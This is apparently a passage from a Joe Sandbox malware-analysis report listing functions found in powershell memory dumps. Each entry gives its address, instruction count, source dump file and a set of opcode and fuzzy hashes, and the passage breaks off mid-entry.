                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 076580DD Relevance: .5, Instructions: 483COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1922872365.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7650000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5734b2763ae717f1df0151795c42450cdc5c69e9f8650293c8aea97b78a80a7f
                                          • Instruction ID: 80657afe595ca41e6b379df745a3f782db1acecaff99f16853a901196cf3505a
                                          • Opcode Fuzzy Hash: 5734b2763ae717f1df0151795c42450cdc5c69e9f8650293c8aea97b78a80a7f
                                          • Instruction Fuzzy Hash: 8E124CB4A00206DFDB20CBA8C544AADBBB2BF85304F14C46AD90A9F755DB72EC46DB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 084E7060 Relevance: .4, Instructions: 436COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1924878743.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_84e0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a7c950f6036685fbcd1f50e0d078d93a98ddee5f6c41f493f89ff9bd4a91ff09
                                          • Instruction ID: 73cb84bb91a6a9cb30f04940b14a4b8184d27d64e0aa055dd1268eca21b6901a
                                          • Opcode Fuzzy Hash: a7c950f6036685fbcd1f50e0d078d93a98ddee5f6c41f493f89ff9bd4a91ff09
                                          • Instruction Fuzzy Hash: DF020975A00219DFDB15CF98D584AAEFBB2FF88321F24855AE805AB355C731ED42CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 07655B48 Relevance: .4, Instructions: 414COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1922872365.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7650000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9caa0d11958ba87de70c3a60f319f851385b587b0c41c2e26d3a2eee4deae0d5
                                          • Instruction ID: 7afcc06c0185b235d8d63244def903c1e71d2000df4e8709e0bb3303dceb4701
                                          • Opcode Fuzzy Hash: 9caa0d11958ba87de70c3a60f319f851385b587b0c41c2e26d3a2eee4deae0d5
                                          • Instruction Fuzzy Hash: EED13AB1714346CFDB158B74C8187AABBA3AF85211F1880ABD847CB353DB35C952DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0765F519 Relevance: .4, Instructions: 397COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1922872365.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7650000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eb28fee2232adae54f1276c53f6ceabcd6751b2ba3184aaf02bc16b002b229e4
                                          • Instruction ID: a3368cd8f206a6630b0a8d9eec0b9a1cdd721227f8c082f2e0c3529d66278f61
                                          • Opcode Fuzzy Hash: eb28fee2232adae54f1276c53f6ceabcd6751b2ba3184aaf02bc16b002b229e4
                                          • Instruction Fuzzy Hash: 77024C70A40218DFEB24DB24C994BEEB7B2EF85304F1084E6D9096B751DB759E81CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 076592AB Relevance: .4, Instructions: 387COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1922872365.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7650000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dd903f5a9757faf3757dc91ec51349624afd8251ac0d62fe3073a7c08400cd1c
                                          • Instruction ID: 5512173a7b23bdfe7c9b9bd726c7d444033453befb3baa8cd53145a29d35e701
                                          • Opcode Fuzzy Hash: dd903f5a9757faf3757dc91ec51349624afd8251ac0d62fe3073a7c08400cd1c
                                          • Instruction Fuzzy Hash: B7F16170A00215DFEB24DB28C854B99B7B3AF84304F10C4A9E90A6F795EB75ED858F61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0765E808 Relevance: .4, Instructions: 363COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1922872365.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7650000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 782ae585732e0b2fd516bf55f8f485fb3b498812206d8a0784db98214957e0a5
                                          • Instruction ID: 24531bd83d8d1a6ff59646db245ca08fa422c5a1aaaa56634bb5f6bb63dbb14e
                                          • Opcode Fuzzy Hash: 782ae585732e0b2fd516bf55f8f485fb3b498812206d8a0784db98214957e0a5
                                          • Instruction Fuzzy Hash: C6E16470A40214DFEB24DB64C894B9EB7B2EF84304F1084A6D9096F795DB76DE818FA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00FCC040 Relevance: .4, Instructions: 354COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1914564555.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_fc0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6b40671e5cce9325c2fa24b51bfb3470f255df0803f08f41567e758740f4fc9a
                                          • Instruction ID: a251555af3271c1f9964e15dfc0a308128b3a60c9fc8b6ce453aa30389deb406
                                          • Opcode Fuzzy Hash: 6b40671e5cce9325c2fa24b51bfb3470f255df0803f08f41567e758740f4fc9a
                                          • Instruction Fuzzy Hash: A2E10775E00219DFDB05CFA8D585A9DBBB2FF89320F298159E809AB351C731ED81DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0765A048 Relevance: .3, Instructions: 339COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1922872365.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7650000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bd6f498d61b4d22dc9d483603f83e126c7290f3ce5a1360886a63ff5af585064
                                          • Instruction ID: 0c6b4e564eab2555e24cabde8f5e11ab6bc96c1ce731cbb07426c58c551f0aff
                                          • Opcode Fuzzy Hash: bd6f498d61b4d22dc9d483603f83e126c7290f3ce5a1360886a63ff5af585064
                                          • Instruction Fuzzy Hash: 71D171B0B10205DFDB24DBA8C454B9EBBB2AF88314F14C529D9026F355DB76DC86CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00FCAD90 Relevance: .3, Instructions: 316COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1914564555.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_fc0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d33c27b7ec50ca6a8578d765994e2219a1f79d1794f5400fcdb6287fefe74e6b
                                          • Instruction ID: 6f56705c9a9077d9d76141e6f92c1195c5508667b1e640f3d4e3f029575518a2
                                          • Opcode Fuzzy Hash: d33c27b7ec50ca6a8578d765994e2219a1f79d1794f5400fcdb6287fefe74e6b
                                          • Instruction Fuzzy Hash: 61C1CE35A002098FCB15DFA5CA86EADBBF2FF85311F154558E406AB365DB34EC49DB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00FC3670 Relevance: .3, Instructions: 316COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1914564555.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_fc0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1667a5e4d5b0cbf32619d8767d1aab5552bd7c82068158bc44a3a100869ca4b6
                                          • Instruction ID: 2d5befcb6a31518906043d3fd57eadd32980d0d6f71fff7b3a880644eb82622b
                                          • Opcode Fuzzy Hash: 1667a5e4d5b0cbf32619d8767d1aab5552bd7c82068158bc44a3a100869ca4b6
                                          • Instruction Fuzzy Hash: 21D11474E01209AFDB05CFA8D585A9DFBB2BF89350F24C159E844AB361C735EE41DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 07658490 Relevance: .3, Instructions: 275COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1922872365.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7650000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 48aabbaa99a92e00e544d1183b202947b1b44e0d5f580a656562fc7138e3bc42
                                          • Instruction ID: 3581545cecd9a0492033fcd8ac412cfaa89fc1fbdcad95f04976dfc88a6c77b5
                                          • Opcode Fuzzy Hash: 48aabbaa99a92e00e544d1183b202947b1b44e0d5f580a656562fc7138e3bc42
                                          • Instruction Fuzzy Hash: 83B193B4B10205DFE714DB68C954BAEBBF3AF89304F108469D9066FB51DB72EC418B61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 07658469 Relevance: .3, Instructions: 274COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1922872365.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7650000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c4ed2089eb07283b0d9e2fa443c87daaa96913e726832afd0a3a909f33f41622
                                          • Instruction ID: cec97cb78b0b9781b851f8c6bad50ba5c228c8d8f82dacfd70fa275d196f5342
                                          • Opcode Fuzzy Hash: c4ed2089eb07283b0d9e2fa443c87daaa96913e726832afd0a3a909f33f41622
                                          • Instruction Fuzzy Hash: 99B1C2B4A10202DFEB14DB68C854BDEBBF2AF85314F108469D9026FB51DB76EC85CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0765A028 Relevance: .3, Instructions: 269COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1922872365.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7650000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b49d2be085c2ae087f9b7da960480edeead749c288bb4f43cb43689b9a79c10a
                                          • Instruction ID: c90225511872d7aa4280480d4139832bf8c399b864bd81122a6040102777fd9c
                                          • Opcode Fuzzy Hash: b49d2be085c2ae087f9b7da960480edeead749c288bb4f43cb43689b9a79c10a
                                          • Instruction Fuzzy Hash: C1B181B0A00205DFDB24DBA8C454B9EBBB2EF88304F15C165D9026F355DB75EC86CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00FC2B48 Relevance: .2, Instructions: 250COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1914564555.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_fc0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3cbb68873b2bea0003e498fb8d5e0355705ccaaaff3c3a2dd6dbd4930972c419
                                          • Instruction ID: 29c2c791469c2644a0dbdcb5dd3bcf68987f0ac1bcf2d434c380dc7c7efa9ce9
                                          • Opcode Fuzzy Hash: 3cbb68873b2bea0003e498fb8d5e0355705ccaaaff3c3a2dd6dbd4930972c419
                                          • Instruction Fuzzy Hash: 4DA1E334A04646CFCB06CF58C591EAEBBB1FF49320B24469AD455EB3A6C335EC51CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00FCAAC8 Relevance: .2, Instructions: 226COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1914564555.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_fc0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0b554b0121f7d591512890d450ee4eb98c9acf40b2ec5ede1aa3bdf94b2afc4b
                                          • Instruction ID: f9fecf1fe28f056a7100f4e20aff80c43d0be0aa4ae25c7f92bacda4558b620f
                                          • Opcode Fuzzy Hash: 0b554b0121f7d591512890d450ee4eb98c9acf40b2ec5ede1aa3bdf94b2afc4b
                                          • Instruction Fuzzy Hash: DB91DD30A012589FCB14DFA8D984EAEBBF2FF89314F148569E045AB361CB34EC85DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 084E6258 Relevance: .2, Instructions: 225COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1924878743.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_84e0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 29faa899f42cd8374c16b0b1a5a290e89476217a81de9f8654fac6de15fc2744
                                          • Instruction ID: 2e45a589efc960b07e0cd2e020cc7a8b32ee153fcb04597719f8076f105e5a6c
                                          • Opcode Fuzzy Hash: 29faa899f42cd8374c16b0b1a5a290e89476217a81de9f8654fac6de15fc2744
                                          • Instruction Fuzzy Hash: 85819E30B002158FCB15DFA9D880AAEB7F6FF88311F158569E405AB356DB35EC02CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00FC8DBE Relevance: .2, Instructions: 188COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1914564555.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_fc0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b20951532c007aabed942026c2aa1ee5b6e6122811403f98676d3ee4c11e29b6
                                          • Instruction ID: 4bee7c5688dbde9652baa3a89984f3be7b23cebaacdab3b0a27ccfa360018f6a
                                          • Opcode Fuzzy Hash: b20951532c007aabed942026c2aa1ee5b6e6122811403f98676d3ee4c11e29b6
                                          • Instruction Fuzzy Hash: CC714930E002199FDB18DFA5D985BADB7F2BF88354F14842DE402AB7A0DB35AD46CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 084E5BF8 Relevance: .2, Instructions: 184COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1924878743.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_84e0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7267dc01755f4ebcf3c504cb283c73b3dc17fbe3cfe69b69379954ef90db590b
                                          • Instruction ID: 1dd5cdd019e2e150401dd3ee08f38866c9577a770fc6ee7b037820e7d5d6fb15
                                          • Opcode Fuzzy Hash: 7267dc01755f4ebcf3c504cb283c73b3dc17fbe3cfe69b69379954ef90db590b
                                          • Instruction Fuzzy Hash: 88714E30E00249CFDB15DFE4C9546AEBBB2BF85306F25852AE402AF395DB74AD49CB41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00FC87BA Relevance: .2, Instructions: 178COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1914564555.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_fc0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cc333e2b9a897719b138bc76b4c9a0b82c443c132e9c35d02a012e1eb9b93967
                                          • Instruction ID: 8eef5b9fbbe237432b468337b1258d1ee26dcf7f627a8dc3bb59119345434888
                                          • Opcode Fuzzy Hash: cc333e2b9a897719b138bc76b4c9a0b82c443c132e9c35d02a012e1eb9b93967
                                          • Instruction Fuzzy Hash: 9A616E35E002498FCB04CFA4D645BADBBB2BF84350F248559E402AF765DB78AD89DB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00FC8C50 Relevance: .2, Instructions: 169COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1914564555.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_fc0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: af5911e9a6800648f262f9704533caf9eb345e8df54c79eb6c64a04da1a3b62d
                                          • Instruction ID: 3983e32fdffd52e2acc73614e8a77caa139d7e6b50fd75116bddd65bf3b0bcea
                                          • Opcode Fuzzy Hash: af5911e9a6800648f262f9704533caf9eb345e8df54c79eb6c64a04da1a3b62d
                                          • Instruction Fuzzy Hash: 67517B30A003059FDB18DFA9D944B9EB7F6FF89354F108869E406AB761DB71AC46CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00FC87C8 Relevance: .2, Instructions: 161COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1914564555.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_fc0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 71763f53ea1473bd71e9142c9b84d3819532c9663aceb093d829d26ca673e5c4
                                          • Instruction ID: 241a185302f0246fcb6fb3a0370932ccb0fd33087243081be42eec4ed27b12d1
                                          • Opcode Fuzzy Hash: 71763f53ea1473bd71e9142c9b84d3819532c9663aceb093d829d26ca673e5c4
                                          • Instruction Fuzzy Hash: 9B613D34E002499FDB04DFA4C645BADBBB2BF84350F258559E402AF365DB78ED89DB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 084E6248 Relevance: .2, Instructions: 150COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1924878743.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_84e0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 91b6f9da391223d7181363de9a6a716be1a003cbc911cb23a3c74f58b0e38883
                                          • Instruction ID: bff7159116b8a1aaedbe2b5e7c4f424e2383bc09162297fc62460eed353ccefe
                                          • Opcode Fuzzy Hash: 91b6f9da391223d7181363de9a6a716be1a003cbc911cb23a3c74f58b0e38883
                                          • Instruction Fuzzy Hash: 0351BD30B002158FDB15DFA9E880AAEFBF6FF88301F158169E405AB355DB359D02CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 07656294 Relevance: .1, Instructions: 148COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1922872365.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7650000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5b9d907873144a3b6660dbad7563a0eed8ebf8daac6cfc178f2bd1025d7c1c4f
                                          • Instruction ID: 2590795a289d2c7269c0c2b62a34db4ffcd8d7d6d4a5b39eb4423c0152dfc93b
                                          • Opcode Fuzzy Hash: 5b9d907873144a3b6660dbad7563a0eed8ebf8daac6cfc178f2bd1025d7c1c4f
                                          • Instruction Fuzzy Hash: DF514370609391DFD7128B64C810BA5BFB1EF46610F59C0DBD8468F293C636DC86D7A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 084E7010 Relevance: .1, Instructions: 144COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1924878743.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_84e0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2580f876aae646746b3f3683538c613fe6884ee24d00855c94cf1617b5b7a80c
                                          • Instruction ID: daf0df0f59fed4828a78b500e91bf13abda20ab95530878e0fb29ba062d04c21
                                          • Opcode Fuzzy Hash: 2580f876aae646746b3f3683538c613fe6884ee24d00855c94cf1617b5b7a80c
                                          • Instruction Fuzzy Hash: 23517174A05245CFDB16CF98C8949AEFBB1FF49322F15859AE440AB366D336AC41CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00FCB2E4 Relevance: .1, Instructions: 124COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1914564555.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_fc0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1529817e63ff3859303cd4eeaa25c1aa4ee66349b2edee3cf27cfab87d26efb3
                                          • Instruction ID: 0bf6f893884d78d80b11b2e4e2c5a840440eff74718af32efdb7e695545b6bbc
                                          • Opcode Fuzzy Hash: 1529817e63ff3859303cd4eeaa25c1aa4ee66349b2edee3cf27cfab87d26efb3
                                          • Instruction Fuzzy Hash: 22416D35B002118FDB28DF65C99ABA97BB2EF89365F14486CE406EB7A0CB349C45DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00FC8C42 Relevance: .1, Instructions: 118COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1914564555.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_fc0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 338516fe3b5080cf0c71349a821db9a76f1e6f997b4dc5ff54ea5efe2183e7c6
                                          • Instruction ID: 8f9bff0d0f9b713a3bf1b113dbbca0ce8f22a5f45a8c1e56ab8197c8f4f48cf4
                                          • Opcode Fuzzy Hash: 338516fe3b5080cf0c71349a821db9a76f1e6f997b4dc5ff54ea5efe2183e7c6
                                          • Instruction Fuzzy Hash: 58418C30A007199FDB18DFA5D945B9DBBF2BF88350F10882DD406AB7A0DB70AC46CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00FCBFF0 Relevance: .1, Instructions: 116COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1914564555.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_fc0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 433a3ea8cbb74e1f586dfe7a9b808d705f0e43d1f8fc8782d1423fdbb9c5ec13
                                          • Instruction ID: 5c502d8056694b17602be62e6b79a1771a4a3c9432dfa2d32ca835c787e6eb5c
                                          • Opcode Fuzzy Hash: 433a3ea8cbb74e1f586dfe7a9b808d705f0e43d1f8fc8782d1423fdbb9c5ec13
                                          • Instruction Fuzzy Hash: DC41A770A04645DFC702CF59C990AA9FBB1FF4A310719869AD454EB752C335ED85CBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00FC2C58 Relevance: .1, Instructions: 111COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1914564555.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_fc0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 87210027e05a36b49d214470f0fd818ceb22dcb77fbb29c6c5bfac50aa50bec8
                                          • Instruction ID: 59df3094aa854b9ef6801cee4815c735edd899e8e9966e52a77bc1c3a0a1b556
                                          • Opcode Fuzzy Hash: 87210027e05a36b49d214470f0fd818ceb22dcb77fbb29c6c5bfac50aa50bec8
                                          • Instruction Fuzzy Hash: F6413874A00606CFDB4ACF59C594EEAFBB1FF48310B1585A9D846AB364C732EC50DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0765A46E Relevance: .1, Instructions: 102COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1922872365.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7650000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6c69ef03e4f634d348fa14d152f23110f1c2ee657dfee647f42f285bec04e253
                                          • Instruction ID: 9c0a2e91f760773b7bb4521988272234f1c57123e45c8ef5e203905416eb40bb
                                          • Opcode Fuzzy Hash: 6c69ef03e4f634d348fa14d152f23110f1c2ee657dfee647f42f285bec04e253
                                          • Instruction Fuzzy Hash: B6319170740214DBE714ABA8C854BAE7BB3AFC5354F10C425EA026F791DFB6DD428BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 07652C8E Relevance: .1, Instructions: 97COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1922872365.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7650000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f7eebc418f930b0f18ee56a645d740ddc52f157d42686730de9636e93eee8ab3
                                          • Instruction ID: 9328286afcc093b848930ec5f6e6cbe6ae0ee68a0d4e61de048f82a3842dc600
                                          • Opcode Fuzzy Hash: f7eebc418f930b0f18ee56a645d740ddc52f157d42686730de9636e93eee8ab3
                                          • Instruction Fuzzy Hash: 213129F3B002109BDB25A36898617EEB362AFC5254F10C57BD9028B740DA72DD46C7A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00FCE500 Relevance: .1, Instructions: 92COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1914564555.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_fc0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fc4353a522cbd69c5e42e29f5ba16c720b47f6ca4d5acd50c61ad00ba2581e6c
                                          • Instruction ID: 12927377f0b7ef93aaab08502964f5d4153c99e1c7ce9e9216baa096d7df92fa
                                          • Opcode Fuzzy Hash: fc4353a522cbd69c5e42e29f5ba16c720b47f6ca4d5acd50c61ad00ba2581e6c
                                          • Instruction Fuzzy Hash: C7317E30B011288FCB29DB24D955BEEB7B2AF49305F1044E9D50AAB352DF359E81CF81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00FC8DFF Relevance: .1, Instructions: 91COMMON
                                          Download Yara Rule
                                          Memory Dump Source
